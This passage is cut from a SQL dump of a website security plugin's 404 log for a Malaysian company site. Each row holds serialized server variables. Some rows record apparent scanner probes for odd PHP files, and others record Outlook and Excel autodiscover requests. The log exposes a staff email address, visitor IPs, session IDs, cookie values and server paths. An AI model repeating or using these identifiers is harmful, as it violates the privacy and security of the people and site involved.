18:40:46',35183920,36988704,'https://bintara.com.my/zaz.php',1,0,'104.218.63.75'),(27100,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/o22opo.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=60cb5ae1add1e3684663e4f87e2aca9e\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/o22opo.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/o22opo.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GJlWB4BRJuHfwY@mOJQAAAMo\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/o22opo.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/o22opo.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GJlWB4BRJuHfwY@mOJQAAAMo\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"104.218.63.75\";s:11:\"REMOTE_PORT\";s:5:\"43210\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/o22opo.php\";s:10:\"SCRIPT_URL\";s:11:\"/o22opo.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GJlWB4BRJuHfwY@mOJQAAAMo\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523238.6577\";s:12:\"REQUEST_TIME\";s:10:\"1569523238\";}}','notice','2019-09-26 18:40:40','2019-09-26 18:40:39',35180184,36982576,'https://bintara.com.my/o22opo.php',1,0,'104.218.63.75'),(27122,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{2E8C8B3F-6050-4392-A8B7-1079C9C906F3}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=42769abfa28a99635ef6b8307b9acb36\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.5 (Build 18F132))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=6559B664-0AB0-4375-90B4-C1140547873D\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY1gFlfhYxBkXBDDAIpjRwAAAJY\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.87\";s:11:\"REMOTE_PORT\";s:5:\"49405\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1gFlfhYxBkXBDDAIpjRwAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569546262.5828\";s:12:\"REQUEST_TIME\";s:10:\"1569546262\";}}','notice','2019-09-27 01:04:24','2019-09-27 01:04:23',35495280,37290912,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.87'),(27121,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{CFDF5F4C-E31B-4662-BC36-3ECF61737309}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=42769abfa28a99635ef6b8307b9acb36\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.5 (Build 18F132))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=6559B664-0AB0-4375-90B4-C1140547873D\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY1gE1fhYxBkXBDDAIpjRQAAAIQ\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.87\";s:11:\"REMOTE_PORT\";s:5:\"49405\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1gE1fhYxBkXBDDAIpjRQAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569546259.7185\";s:12:\"REQUEST_TIME\";s:10:\"1569546259\";}}','notice','2019-09-27 01:04:21','2019-09-27 01:04:20',35495280,37290912,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.87'),(27120,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{C607FCF6-A2F7-4999-9788-2A4763946A1E}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=42769abfa28a99635ef6b8307b9acb36\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.5 (Build 18F132))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=6559B664-0AB0-4375-90B4-C1140547873D\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY1gEVfhYxBkXBDDAIpjQQAAAIc\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.87\";s:11:\"REMOTE_PORT\";s:5:\"49405\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1gEVfhYxBkXBDDAIpjQQAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569546257.2508\";s:12:\"REQUEST_TIME\";s:10:\"1569546257\";}}','notice','2019-09-27 01:04:18','2019-09-27 01:04:17',35495280,37290912,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.87'),(27119,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{A7B717F3-6B87-4FF7-BD13-61452DC093BF}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.5 (Build 18F132))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=6559B664-0AB0-4375-90B4-C1140547873D\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY1gDlfhYxBkXBDDAIpjPwAAAI0\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.87\";s:11:\"REMOTE_PORT\";s:5:\"49405\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1gDlfhYxBkXBDDAIpjPwAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569546254.1888\";s:12:\"REQUEST_TIME\";s:10:\"1569546254\";}}','notice','2019-09-27 01:04:15','2019-09-27 01:04:14',35494696,37289520,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.87'),(27117,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3428.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"194.44.189.54\";s:11:\"REMOTE_PORT\";s:5:\"45165\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1YGlfhYxBkXBDDAIpgFgAAAJQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569544218.2514\";s:12:\"REQUEST_TIME\";s:10:\"1569544218\";}}','notice','2019-09-27 00:30:20','2019-09-27 00:30:18',35521768,37336464,'https://bintara.com.my/?page_id=18',1,0,'194.44.189.54'),(27118,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:16:\"HTTP_ACCEPT_AUTH\";s:21:\"badger,Wlid1.1,Bearer\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"87BDFE9B-77AB-4907-8951-2B19A4C8645F\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY1Z8muDzxgKwmTS@aKNpQAAAFQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.87\";s:11:\"REMOTE_PORT\";s:5:\"55586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1Z8muDzxgKwmTS@aKNpQAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569544690.165\";s:12:\"REQUEST_TIME\";s:10:\"1569544690\";}}','notice','2019-09-27 00:38:11','2019-09-27 00:38:10',35495064,37292200,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.87'),(27116,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.106 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"93.81.252.222\";s:11:\"REMOTE_PORT\";s:5:\"46713\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kual